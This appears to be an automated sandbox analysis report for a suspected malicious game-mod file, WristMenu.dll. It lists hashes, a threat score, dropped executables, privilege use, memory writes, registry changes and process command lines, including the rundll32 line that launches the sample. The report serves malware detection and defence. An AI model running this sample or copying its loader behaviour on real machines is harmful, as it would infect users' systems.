c05eadb4c81e5c489b56b1c54edde4fd7f787be1a099312fc97e321a3c71af5c

Analysis

max time kernel
211s
max time network
198s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
29/08/2023, 00:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WristMenu.dll
Size

1.8MB
MD5

1cabfe41c910eade4a82cfacbf5e8d06
SHA1

9eb17b965576c097719accea35af87c70588bb63
SHA256

c05eadb4c81e5c489b56b1c54edde4fd7f787be1a099312fc97e321a3c71af5c
SHA512

7c1b09e0badf3bd8cc6b7395e6485a4badac664fbb4960320cb76e11195b7b7fca9e44f0aff3b174b15e5ba34eb97700a1ec496f11c4fa1aabd610e8b38c8f27
SSDEEP

12288:pYqXFv/iwEwpGGbBcMLEDAJ0HfSrcSyHlL456F7B5VBFIWzZTbZUiHXaHdiRbj3j:jEDnR/vIW1wiR339YijEJVN/WZN

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
3708	Loader.exe
3716	Gorilla Tag.exe
1140	smi.exe

Loads dropped DLL 1 IoCs

pid	Process
3716	Gorilla Tag.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4000	1140	WerFault.exe	131

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Gorilla Tag.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 0000000001000000ffffffff	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Gorilla Tag.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	Gorilla Tag.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Gorilla Tag.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Gorilla Tag.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic"	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Gorilla Tag.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Gorilla Tag.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	Gorilla Tag.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Gorilla Tag.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Gorilla Tag.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	Gorilla Tag.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	Gorilla Tag.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\NodeSlot = "8"	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	Gorilla Tag.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1"	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Gorilla Tag.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic"	Gorilla Tag.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Gorilla Tag.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Gorilla Tag.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\MRUListEx = ffffffff	Gorilla Tag.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Gorilla Tag.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Gorilla Tag.exe
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Gorilla Tag.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3716	Gorilla Tag.exe
3716	Gorilla Tag.exe
3708	Loader.exe
1140	smi.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3716	Gorilla Tag.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeRestorePrivilege	4912	7zG.exe
Token: 35	4912	7zG.exe
Token: SeSecurityPrivilege	4912	7zG.exe
Token: SeSecurityPrivilege	4912	7zG.exe
Token: SeDebugPrivilege	3708	Loader.exe
Token: SeDebugPrivilege	1140	smi.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4912	7zG.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3716	Gorilla Tag.exe
3716	Gorilla Tag.exe
3716	Gorilla Tag.exe
3716	Gorilla Tag.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 3708 wrote to memory of 1404	3708	Loader.exe	126
PID 3708 wrote to memory of 1404	3708	Loader.exe	126
PID 3708 wrote to memory of 1404	3708	Loader.exe	126
PID 1404 wrote to memory of 4516	1404	cmd.exe	128
PID 1404 wrote to memory of 4516	1404	cmd.exe	128
PID 1404 wrote to memory of 4516	1404	cmd.exe	128
PID 3708 wrote to memory of 1872	3708	Loader.exe	129
PID 3708 wrote to memory of 1872	3708	Loader.exe	129
PID 3708 wrote to memory of 1872	3708	Loader.exe	129
PID 1872 wrote to memory of 1140	1872	cmd.exe	131
PID 1872 wrote to memory of 1140	1872	cmd.exe	131
PID 3708 wrote to memory of 2792	3708	Loader.exe	135
PID 3708 wrote to memory of 2792	3708	Loader.exe	135
PID 3708 wrote to memory of 2792	3708	Loader.exe	135

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\WristMenu.dll,#1
1⤵
PID:4468

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc84eb9758,0x7ffc84eb9768,0x7ffc84eb9778
1⤵
PID:2660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:8
1⤵
PID:856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:2
1⤵
PID:4584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2248 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:8
1⤵
PID:4292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=3028 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:1
1⤵
PID:4656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=3008 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:1
1⤵
PID:4156

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --mojo-platform-channel-handle=4588 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:1
1⤵
PID:2904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4780 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:8
1⤵
PID:4556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4928 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:8
1⤵
PID:2816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5076 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:8
1⤵
PID:1404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5224 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:8
1⤵
PID:548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:8
1⤵
PID:3816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --mojo-platform-channel-handle=5208 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:1
1⤵
PID:3348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3032 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:8
1⤵
PID:5024

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --mojo-platform-channel-handle=3080 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:1
1⤵
PID:4596

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:8
1⤵
PID:788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5464 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:8
1⤵
PID:3612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5196 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:1
1⤵
PID:2860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --mojo-platform-channel-handle=5820 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:1
1⤵
PID:2268

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3284 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:8
1⤵
PID:1136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5956 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:8
1⤵
PID:1252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=5404 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:1
1⤵
PID:3352

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --mojo-platform-channel-handle=5684 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:1
1⤵
PID:1340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6108 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:8
1⤵
PID:3960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --mojo-platform-channel-handle=6596 --field-trial-handle=1876,i,9773458094216352022,1858380388268091262,131072 /prefetch:1
1⤵
PID:924

C:\Program Files\7-Zip\7zG.exe
